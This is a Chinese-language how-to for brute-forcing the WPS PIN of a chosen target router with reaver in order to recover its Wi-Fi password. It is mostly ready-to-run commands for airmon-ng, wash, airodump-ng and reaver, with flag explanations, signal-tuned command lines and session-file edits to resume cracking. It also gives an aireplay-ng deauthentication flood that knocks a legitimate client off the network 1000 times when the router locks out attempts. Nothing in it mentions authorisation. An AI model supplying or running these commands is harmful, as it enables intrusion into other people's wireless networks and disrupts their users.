reaver跑路由器pin码过程：(root权限下)

1 输入：airmon-ng start wlan0 开启监听模式

2 输入：wash -i mon0 -C 查看所有开启WPS的无线路由 长时间无反应按Ctrl+C，结束进程,这时记下你要PJ的目标路由MAC.

3 输入：airodump-ng mon0 网卡以混杂模式扫描所有频道—并显示所有AP的信息(包括 AP的信号强度,ESSID,MAC,频道,加密方式,等等…..)，按Ctrl+C，结束扫描.

4 输入：reaver -i mon0 -b MAC -a -S -vv 开始穷举pin码

　　reaver 参数详解：

　　-i, –interface=<wlan> Name of the monitor-mode interface to use

　　　　网卡的监视接口，通常是mon0（必需） 　　-b, –bssid=<mac> BSSID of the target AP 　　　　AP的MAC地址（必需）

　　-c, –channel=<channel> Set the 802.11 channel for the interface (implies -f)

　　　　信号的频道，如果不指定会自动扫描，如-c1 指定1频道（常用）

　　-a, –auto Auto detect the best advanced options for the target AP

　　　　对目标AP自动检测高级参数，自动检测目标AP最佳配置（常用）

　　-v, –verbose Display non-critical warnings (-vv for more)

　　　　显示不重要警告信息 -vv 可以显示更多（常用）

　　-S 使用最小的DH key，可以提高PJ速度（常用）

　　-t 即timeout每次穷举等待反馈的最长时间（常用）

　　-s, –session=<file> Restore a previous session file

　　　　恢复进度文件

　　-N, –no-nacks Do not send NACK messages when out of order packets are received

　　　　不发送NACK信息

　　-n, –nack Target AP always sends a NACK [Auto]

　　　　对目标AP总是发送NACK，默认自动

　　-f, –fixed Disable channel hopping

　　　　禁止频道跳转

　　-p, –pin=<wps pin> Use the specified 4 or 8 digit WPS pin

　　　　使用指定的4位或者8位pin码，可以用8位直接找到密码（常用） 　　-d, –delay=<seconds> Set the delay between pin attempts [1] 　　　　pin间延时，默认1秒（常用） 　　-l, –lock-delay=<seconds> Set the time to wait if the AP locks WPS pin attempts [60] 　　　　AP锁定WPS后等待时间 　　-g, –max-attempts=<num> Quit after num pin attempts 　　　　最大pin次数

　　-q, –quiet Only display critical messages

　　　　只显示关键信息

　　-h, –help Show help

　　　　显示帮助

因状况调整参数（-c后面都已目标频道为1作为例子）

目标信号非常好:  reaver  -i  mon0  -b MAC  -a  -S  -vv  -d0  -c 1 目标信号普通:  reaver  -i  mon0  -b MAC  -a  -S  -vv  -d2  -t .5  -c 1 目标信号一般:  reaver  -i  mon0  -b MAC  -a  -S  -vv  -d5  -c 1

常见问题的处理：

1.如果出现超长的WPA PSK可以使用第四条命令“reaver –i mon0 –b MAC –p WPA PSK”

MAC为目标的mac地址，WPA PSK为获取到的超长密码。作用是将指定的pin码获取 wpa密码psk。

2.reaver -i mon0 -b MAC -p PIN8位数

直接由pin码得到psk密码

3.90.9%进程后出现问题或卡死，请记下PIN前四位数，重新跑后三位数，如果前四位正确的话

  reaver -i mon0 -b MAC -p PIN前4位数

4.PIN僵死锁定后的方法。也可以攻击隐藏ssid的路由 aireplay-ng-0 1000 -a SSID 的MAC -c 合法客户端的MAC 网卡端口

 就是让客户端断开连接1000次macchanger

pin码的进度文件保存在/usr/local/etc/下，XXXXXXXXXXXX.wpc (MAC地址为文件名)

MAC.wpc结构

0                  //第一行，这个地方是说它的前4位PIN码的进度位置数 0                  //第二行，这个地方是说后3位PIN数的已经运行测试位置数 0                  //第三行，0时没有找到，当为1时找到前四位，当为2时全部找到. 1234 0123 1111 2222 3333 ....... .......

 

如我们要从2000开始pin,你可以将第一行修改为2004,这样它就会从2000开始PIN了.

命令是这样的  reaver -i mon0 -b xx:xx:xx:xx:xx -a -S -vv -s /usr/local/etc/XXXXXXXXXXXX.wpc , 小写的-s后面跟进度文件的路径.